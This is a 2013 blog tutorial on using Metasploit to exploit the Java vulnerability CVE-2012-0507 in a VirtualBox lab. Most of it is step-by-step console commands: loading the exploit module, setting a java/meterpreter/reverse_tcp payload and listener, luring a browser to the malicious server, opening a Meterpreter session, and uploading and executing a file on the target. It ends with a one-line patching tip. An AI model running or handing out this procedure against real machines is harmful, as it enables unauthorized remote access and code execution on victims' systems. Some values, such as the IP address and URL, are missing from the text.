Tuesday 10 September 2013

Hack Remote System With Metasploit Complete Tutorial

Whenever someone say PenTesting tool, the first thing come in our mind is MetaSploit . Today, i am going to demonstrate how to use the Metasploit tool to exploit the popular java vulnerability(CVE-2012-0507).

About MetaSploit:
Metsploit is a very Powerful PenTesting Tool . Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. Very useful tool for Information Gathering, Vulnerability Scanning, Exploit Development, Client side exploits,...

Mastering the Framework: A free course from Offensive-Security
The Offensive Security Team along with several active community members, made a free course on the Metasploit Framework "Mastering the Framework". The course covers Information gathering, Social engineering attacks, exploit development, Advance AV avoidance and etc...

The course is available here:

Donate to HFC, Feed a Child!
The "Mastering the Framework" is free course. If you enjoyed the course, please donate to Hackers for Charity(HFC). Beyond merely providing food for children in need in East Africa, the Hackers for Charity Food Program enables children and their families to provide for themselves and become more self-sufficient by teaching them valuable agricultural skills. Every cent received is directly sent Hackers for Charity in support of their mission. Any amount, no matter how small, makes a difference; it only takes $9.00 to feed a child for a month.

You can find further details about the donation here:

Hey, where are you going?! Wait a Sec, take that course Once i demonstrate how to use the metasploit. Because, It will be hard to understand or boring, if you read those things directly.


  • VirtualBox 
  • Target OS(windows,...)
  • PenTesting Distro(Backtrack )
  • JRE 6(unpatched version)

CVE-2012-0507 is a vulnerability in the JRE due to the fact that The AtomicReferenceArray class implementation did not properly check if the array is of an expected Object[] type. A malicious Java application or applet could use this flaw to cause Java Virtual Machine(JVM) to crash or bypass Java sandbox restrictions.

Security News: This vulnerability affects Windows, Mac and Linux operating systems. Last month, Flashback malware infect more than 600,000 Mac computers by exploiting this vulnerability. Recently, The INSS , The Amnesty International UK websites injected with malicious code that exploit the CVE-2012-0507.

I am going to demonstrate this vulnerability with VirtualBox.  I have setup two Virtual Machines namely "Target" and "BT5". I have installed XP 2 in the Target and Backtrack 5 R2 in the 'BT5'.

(need help in configuring the VM?, read this: setup PenTesting Lab).

Part I: Preparing the Target Machine:

Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:

Now, start the BT5.

Open the Terminal and Type "msfupdate".  This will update the Metasploit Framework(MSF) with the latest exploits and Payloads. As CVE-2012-0507 is latest vulnerability, you have to update the MSF before proceeding further.

slow Internet Connection?! If you have slow internet connection, then you can download the java_atomicreferencearray module alone instead of updating all modules.
Download the java_atomicreferencearray.rb and paste in this folder "/opt/metasploit/msf3/modules/exploits/multi/browser/"

Then, Download CVE-2012-0507.jar and paste in this folder "/opt/metasploit/msf3/data/exploits/"

Part III : Exploiting Java vulnerability CVE-2012-0507:

Step 1:
Open the Terminal and type "msfconsole".  This will bring the Metasploit console , here you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray" . This command will use the java_atomicreferencearray.rb module for the attack.

Now type "show options" to display the which settings are available and/or required for this specific module. 

Now type "set SRVPORT 80".
and  "set URIPATH /".

Step 3: Set Payload 
Type "show payloads", this will displays the list of payloads.  We are going to use the 'reverse_tcp' payload. This payload will get reverse tcp connection from the Target to PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.

set LHOST [IP_address] :  In order to get reverse connection, we have to set our IP in the LHOST.  

open the Terminal and type "ifconfig". This will display the IP info of our PenTesting Machine.  The IP will be "192.168.56.x".   For instance, let me say the ip is 

Now  Type in the msfconsole as "set LHOST". 

Part IV: Breaching the Target Machine:

So , are you ready?! Let us break into the Target Machine. 

Step 1:

Type "exploit" in the msfconsole. This will start the reverse handler to our Machine and it will wait anyone that will connect to the our HTTP server (Eg: Once victim connect to our server, it will send a jar will that will exploit the CVE-2012-0507 vulnerability.

step 2: 

Open the Firefox/IE in the Target machine.  
Enter "".
It loads nothing but exploit will run in the background.

Step 3:
Open the BT5 machine, it will display the following output:

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control with the Target.

Step 4:Upload files
Yeeeh..! we got backdoor to the Target machine, now we can run any commands in the Target.

For Example, Typing 'sysinfo' will display the system information.

You can also upload and execute your own executable files in the Target machine.

'upload /Test.exe c:\\", this command will upload the Test.exe from the root('file system' dir) folder of the BT5 to the C drive of the Target.

'execute -f C:\\Test.exe", this command will run our uploaded File in the Target.

Security Tips:
Update your JRE to the latest version. 

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